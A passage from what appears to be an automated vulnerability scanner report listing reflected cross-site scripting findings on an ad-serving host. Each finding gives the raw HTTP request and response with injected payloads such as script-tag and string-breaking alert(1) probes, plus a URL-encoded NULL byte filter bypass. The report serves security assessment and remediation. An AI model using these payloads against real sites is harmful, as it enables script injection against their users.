The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db9c4'%3b6f7b580b6b3 was submitted in the REST URL parameter 4. This input was echoed as db9c4';6f7b580b6b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/148848786/db9c4'%3b6f7b580b6b3 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7013
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:57:52 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_728x90.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/148848786/db9c4';6f7b580b6b3;ai.197614850.196614446.198086532;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/148848786/db9c4';6f7b580b6b3;ai.197614850.196614446.198086532;ct.1/01" />
...[SNIP]...

5.262. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c9648"-alert(1)-"596946acf51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9648"-alert(1)-"596946acf51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&%00c9648"-alert(1)-"596946acf51=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1746
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:22:17 GMT

<SCRIPT Language="Javascript">
var DCcode="N5506.MSN/B5070033.82;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&%00c9648"-alert(1)-"596946acf51=1http://clk.redcated/goiframe/201270508.201301833/148848786/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.263. http://redcated/APM/iview/148848786/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/148848786/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf4f"-alert(1)-"841113d9fd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=&aaf4f"-alert(1)-"841113d9fd6=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1814
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:50 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&aaf4f"-alert(1)-"841113d9fd6=1http://clk.redcated/goiframe/196246454.198101735/148848786/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.264. http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /BEL/iview/262582811/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9888"><script>alert(1)</script>cc40f9e2ce0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BEL/iview/262582811/direct;/01?click=&b9888"><script>alert(1)</script>cc40f9e2ce0=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 278
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:44 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/184054348/262582811/direct/01" onclick="(new Image).src='&b9888"><script>alert(1)</script>cc40f9e2ce0=1http://t.redcated'"><i
...[SNIP]...

5.265. http://redcated/CNT/iview/286609711/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d60d2'%3b889c50d9e7 was submitted in the REST URL parameter 4. This input was echoed as d60d2';889c50d9e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/286609711/directd60d2'%3b889c50d9e7 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6858
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:24 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_234x60</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
aram name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_234x60.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286609711/directd60d2';889c50d9e7;ai.198086407;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/286609711/directd60d2';889c50d9e7;ai.198086407;ct.1/01" />
...[SNIP]...

5.266. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff63"-alert(1)-"b8cabc26dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&5ff63"-alert(1)-"b8cabc26dc6=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7361
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:09 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
ghtVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91294248915129();
var _CP91294248915129_Instance =
{
click : "http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&5ff63"-alert(1)-"b8cabc26dc6=1",
clickThruUrl: "http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

5.267. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7dd'-alert(1)-'7cad214e775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&df7dd'-alert(1)-'7cad214e775=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7354
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:10 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
248915129.replace(/!~!click!~!/g,'');
else
_strContentCP91294248915129 = _strContentCP91294248915129.replace(/!~!click!~!/g,'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&df7dd'-alert(1)-'7cad214e775=1');
}
else
{
_strContentCP91294248915129 = '<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adcli
...[SNIP]...

5.268. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>3d3a34b2b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a"><script>alert(1)</script>3d3a34b2b9b=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7436
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a"><script>alert(1)</script>3d3a34b2b9b=1\')(new Image).src=\'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a">
...[SNIP]...

5.269. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9006</script><script>alert(1)</script>8f405b36698 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\e9006</script><script>alert(1)</script>8f405b36698 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7456
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:52 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
ightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91294248915129();
var _CP91294248915129_Instance =
{
click : "http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\e9006</script><script>alert(1)</script>8f405b36698",
clickThruUrl: "http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

5.270. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53626'-alert(1)-'73c6470eb21 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\53626'-alert(1)-'73c6470eb21 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7346
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:53 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
4248915129.replace(/!~!click!~!/g,'');
else
_strContentCP91294248915129 = _strContentCP91294248915129.replace(/!~!click!~!/g,'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\53626'-alert(1)-'73c6470eb21');
}
else
{
_strContentCP91294248915129 = '<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adclick
...[SNIP]...

5.271. http://redcated/CNT/iview/287065754/direct [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 808cf'%3b519671d0d4e was submitted in the REST URL parameter 4. This input was echoed as 808cf';519671d0d4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/287065754/direct808cf'%3b519671d0d4e;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6885
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:19 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
ram name="movie" value="HTTP://ec.atdmt.com/ds/CJCNTCINGCIN/FreePhone_TestEvergreen_011811/FreePhone_TestEvergreen_160x600_011811.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/287065754/direct808cf';519671d0d4e;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/287065754/direct808cf';519671d0d4e;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01" />
...[SNIP]...

5.272. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e71"><script>alert(1)</script>c77fec40792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&12e71"><script>alert(1)</script>c77fec40792=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6953
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:57 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199704563;ct.1/01/" onclick="if(\'&12e71"><script>alert(1)</script>c77fec40792=1\')(new Image).src=\'&12e71">
...[SNIP]...

5.273. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a61'-alert(1)-'72d6f3aa6b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&48a61'-alert(1)-'72d6f3aa6b9=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6804
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:04 GMT

<html><head><title>mdfSONY_Online_160x600_122110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;mar
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentCIN1292962199521 = _strContentCIN1292962199521.replace(/!~!click!~!/g,'');
else
_strContentCIN1292962199521 = _strContentCIN1292962199521.replace(/!~!click!~!/g,'&48a61'-alert(1)-'72d6f3aa6b9=1');
}
else
{
_strContentCIN1292962199521 = '<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.195741346;ct.1/01/" onclick="if(\'&48a61'-alert(1)-'
...[SNIP]...

5.274. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed550"-alert(1)-"3987c2801f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&ed550"-alert(1)-"3987c2801f9=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6786
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:02 GMT

<html><head><title>mdfMOTO_shop_160x600_122110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margi
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIN1292967337071();
var _CIN1292967337071_Instance =
{
click : "&ed550"-alert(1)-"3987c2801f9=1",
clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.195764836;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : fu
...[SNIP]...

5.275. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462ea</script><script>alert(1)</script>69e81c4a77c was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=462ea</script><script>alert(1)</script>69e81c4a77c HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6980
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:47 GMT

